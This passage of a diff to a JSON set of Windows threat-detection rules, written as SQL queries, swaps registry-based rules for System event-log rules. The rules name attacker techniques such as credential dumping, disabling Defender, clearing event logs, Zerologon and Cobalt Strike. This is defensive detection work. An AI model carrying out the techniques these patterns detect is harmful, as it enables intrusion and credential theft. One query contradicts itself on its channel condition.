('System', 'Security', 'Application'))" ], - "filename": "registry_set_set_nopolicies_user.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Eventlog Cleared", + "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Administrator actions" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" ], - "filename": "registry_set_disable_windows_defender_service.yml" + "filename": "win_system_eventlog_cleared.yml" }, { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", - "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_office_security.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", - "author": "frack113", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Disable Tamper Protection on Windows Defender", - "id": "93d298a1-d28f-47f1-a468-d971e7796679", + "title": "NTLMv1 Logon Between Client and Server", + "id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "status": "experimental", - "description": "Detects disabling Windows Defender Tamper Protection", - "author": "Austin Songer @austinsonger", + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "author": "Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1550.002", + "attack.s0363" ], "falsepositives": [ - "Unknown" + "Environments that use NTLMv1" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'LsaSrv' AND EventID = '6038')" ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + "filename": "win_system_lsasrv_ntlmv1.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2021-42278 Exploitation Attempt", + "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "status": "test", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38'))" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_system_exploit_cve_2021_42278.yml" }, { - "title": "Disable Internal Tools or Feature in Registry", - "id": "e2482f8d-3443-4237-b906-cc145d87a076", - "status": "experimental", - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential CVE-2021-42287 Exploitation Attempt", + "id": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", + "status": "test", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))" + ], + "filename": "win_system_exploit_cve_2021_42287.yml" + }, + { + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_set_disable_function_user.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Volume Shadow Copy Mount", + "id": "f512acbf-e662-4903-843e-97ce4652b740", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects volume shadow copy mount via windows event log", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of volume shadow copy mounts (backups maybe)." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Ntfs' AND EventID = '98' AND DeviceName LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_system_volume_shadow_copy_mount.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", - "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "status": "test", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "Windows Update Error", + "id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", + "description": "Windows Update get some error Check if need a 0-days KB", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.resource_development", + "attack.t1584" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-WindowsUpdateClient' AND EventID IN ('16', '20', '24', '213', '217'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_system_susp_system_update_error.yml" }, { - "title": "Modification of IE Registry Settings", - "id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "status": "experimental", - "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", - "author": "frack113", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings%' ESCAPE '\\') AND NOT ((Details LIKE 'DWORD%' ESCAPE '\\') OR (Details IN ('Cookie:', 'Visited:', '(Empty)')) OR ((TargetObject LIKE '%\\\\Cache%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ZoneMap%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WpadDecision%' ESCAPE '\\')) OR (Details = 'Binary Data') OR (TargetObject LIKE '%\\\\Accepted Documents\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_set_persistence_ie.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Installation in Suspicious Folder", + "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "status": "experimental", + "description": "Detects service installation in suspicious folder appdata", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", "attack.persistence", - "attack.t1547.008" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_service_installation_folder.yml" }, { - "title": "Run Once Task Configuration in Registry", - "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", - "status": "test", - "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", - "author": "Avneet Singh @v3t0_, oscd.community", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Legitimate modification of the registry key by legitimate program" + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((Details LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((Details LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE 